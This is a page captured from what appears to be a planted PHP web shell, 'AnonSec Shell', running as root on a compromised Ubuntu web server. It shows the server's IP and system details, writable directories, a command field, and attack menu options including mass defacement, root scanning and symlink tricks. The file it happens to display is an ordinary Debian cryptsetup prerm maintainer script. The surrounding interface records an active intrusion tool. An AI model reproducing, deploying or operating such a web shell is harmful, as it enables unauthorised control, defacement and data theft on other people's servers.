AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/lib/dpkg/info/cryptsetup-initramfs.prerm
#! /bin/sh

set -e

. /usr/share/debconf/confmodule

case "$1" in
    remove)
	if grep -q '^dm_mod\s' /proc/modules; then
        # XXX we overshoot here, only devices that need to be present at
        # initramfs stage need to be checked here
		cryptmap="$(dmsetup table --target crypt | sed -n 's/:.*//p' | tr '\n' ' ')"
		if [ -n "$cryptmap" ]; then
				db_fset cryptsetup-initramfs/prerm_active_mappings seen false
				db_subst cryptsetup-initramfs/prerm_active_mappings cryptmap "$cryptmap"
				db_input high cryptsetup-initramfs/prerm_active_mappings || true
				db_go || true
				db_get cryptsetup-initramfs/prerm_active_mappings
				if [ "$RET" = "false" ]; then
					exit 1
				fi
		fi
	fi
    ;;
esac



exit 0

Anon7 - 2022
AnonSec Team